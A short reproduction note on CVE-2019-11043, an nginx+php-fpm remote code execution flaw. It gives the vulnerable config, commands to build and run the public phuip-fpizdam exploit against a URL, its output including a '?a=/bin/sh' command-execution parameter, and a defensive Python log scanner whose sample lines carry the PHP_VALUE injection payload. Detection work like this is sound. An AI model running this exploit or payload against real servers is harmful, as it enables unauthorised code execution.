# CVE-2019-11043 nginx+php-fpm RCE
Vulnerable environment:
The web server runs nginx + php-fpm and the nginx configuration contains a location block similar to the following:
```
location ~ [^/]\.php(/|$) {
…
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php:9000;
…
}
```
Exploit tool preparation:
```
go install github.com/neex/phuip-fpizdam
phuip-fpizdam [url]
# or build from a clone
git clone https://github.com/neex/phuip-fpizdam
cd phuip-fpizdam
go build
./phuip-fpizdam [url]
```
Output:
```
Base status code is 200
Status code 500 for qsl=1745, adding as a candidate
The target is probably vulnerable. Possible QSLs: [1735 1740 1745]
Attack params found: --qsl 1735 --pisos 126 --skip-detect
Trying to set "session.auto_start=0"...
Detect() returned attack params: --qsl 1735 --pisos 126 --skip-detect <-- REMEMBER THIS
Performing attack using php.ini settings...
Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
Trying to cleanup /tmp/a...
Done!
```
Code execution:
```
?a=
```
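As an added defender-side example (not code from the post or from the phuip-fpizdam project), a small Python scanner that flags nginx access-log lines showing the request pattern behind this CVE: an encoded newline in the path of a `.php` request, `PHP_VALUE` smuggled through PATH_INFO, HTTP 500 responses to very long query strings (the tool's qsl probing seen in the output above), and the `?a=/bin/sh` command check from the tool's success message. The sample log lines, the length threshold and the heuristics themselves are constructed assumptions.

```python
import re
from urllib.parse import unquote

# nginx "combined" log format: ip ident user [time] "METHOD URI PROTO" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3}) ')

# Heuristic threshold (assumed, not from the post): the tool probes query-string lengths
# ("qsl") around 1700+ bytes looking for an HTTP 500 from php-fpm.
QSL_SUSPECT = 1000

# Constructed sample access log (not real traffic): line 2 is a qsl probe carrying PHP_VALUE
# and an encoded newline, line 3 is the post-exploitation "?a=/bin/sh" call from the post.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [25/Oct/2019:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "curl/7.64.0"',
    '10.0.0.9 - - [25/Oct/2019:10:00:02 +0000] "GET /index.php/PHP_VALUE%0Asession.auto_start=0;;;?'
    + "Q" * 1745 + ' HTTP/1.1" 500 0 "-" "Go-http-client/1.1"',
    '10.0.0.9 - - [25/Oct/2019:10:00:03 +0000] "GET /index.php?a=/bin/sh+-c+\'which+which\'& HTTP/1.1" 200 20 "-" "Go-http-client/1.1"',
    '10.0.0.7 - - [25/Oct/2019:10:00:04 +0000] "GET /static/app.js HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
])

def classify(line):
    """Return the reasons a log line looks like CVE-2019-11043 activity (empty list if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    _ip, _method, uri, status = m.groups()
    path, _, query = uri.partition("?")
    reasons = []
    # The PoC relies on a URL-encoded newline in the path so that fastcgi_split_path_info's
    # "(/.*)$" no longer matches and PATH_INFO reaches php-fpm empty.
    if ".php" in path.lower() and re.search(r"%0[aA]", path):
        reasons.append("encoded newline in path of .php request")
    if re.search(r"PHP_(ADMIN_)?VALUE", unquote(path), re.I):
        reasons.append("PHP_VALUE injected via PATH_INFO")
    if status == "500" and len(query) >= QSL_SUSPECT:
        reasons.append(f"HTTP 500 with {len(query)}-byte query string (qsl probing)")
    if re.search(r"(^|&)a=/bin/sh", unquote(query)):
        reasons.append("command execution via ?a=/bin/sh (tool's success check)")
    return reasons

def scan(log_text):
    """Map each suspicious line number (1-based) to its list of reasons."""
    hits = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        reasons = classify(line)
        if reasons:
            hits[n] = reasons
    return hits
```

Run `scan()` over a real access log read from disk; a single hit on the newline or PHP_VALUE heuristic is enough to warrant patching php-fpm and reviewing the host, since legitimate traffic does not produce those paths.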